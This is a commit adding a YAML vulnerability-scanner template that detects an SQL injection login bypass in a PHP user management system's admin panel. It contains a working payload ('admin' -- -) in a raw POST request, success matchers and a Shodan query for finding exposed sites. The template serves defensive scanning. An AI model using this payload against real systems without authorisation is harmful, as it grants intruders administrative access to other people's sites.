Merge pull request #9450 from Eyub-kurnaz/User_Registration_Login_and_User_Management_System

add User-Registration-Login-and-User-Management-System admin panel sqli
2024-04-16 15:34:34 +05:30 · 2024-04-16 15:34:34 +05:30 · e8c115c73f
parent de1e7849f4 0f8bc1f44f
commit e8c115c73f
1 changed files with 45 additions and 0 deletions
--- a/http/vulnerabilities/other/user-management-system-sqli.yaml
+++ b/http/vulnerabilities/other/user-management-system-sqli.yaml
@ -0,0 +1,45 @@
+id: user-management-system-sqli
+
+info:
+  name: User Management/Registration & Login v3.0 - SQL Injection
+  author: f0xy
+  severity: high
+  description: |
+    User Registration & Login and User Management System v3.0 admin panel has SQL vulnerability. Even though the person who discovered the vulnerability tested it in version 3.0, version 3.2 also contains the same vulnerability. It can be exploited by entering "admin' -- -" as the username parameter in the admin panel.
+  reference:
+    - https://www.exploit-db.com/exploits/51695
+    - https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: title:"Registration and Login System"
+  tags: sqli,auth-bypass,user-management
+
+http:
+  - raw:
+      - |
+        POST /admin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin%27+--+-&password=whatever&login=
+
+      - |
+        GET /admin/dashboard.php HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Admin Dashboard"
+          - "Manage Users"
+          - "Signout"
+        condition: and
+
+      - type: status
+        status:
+          - 200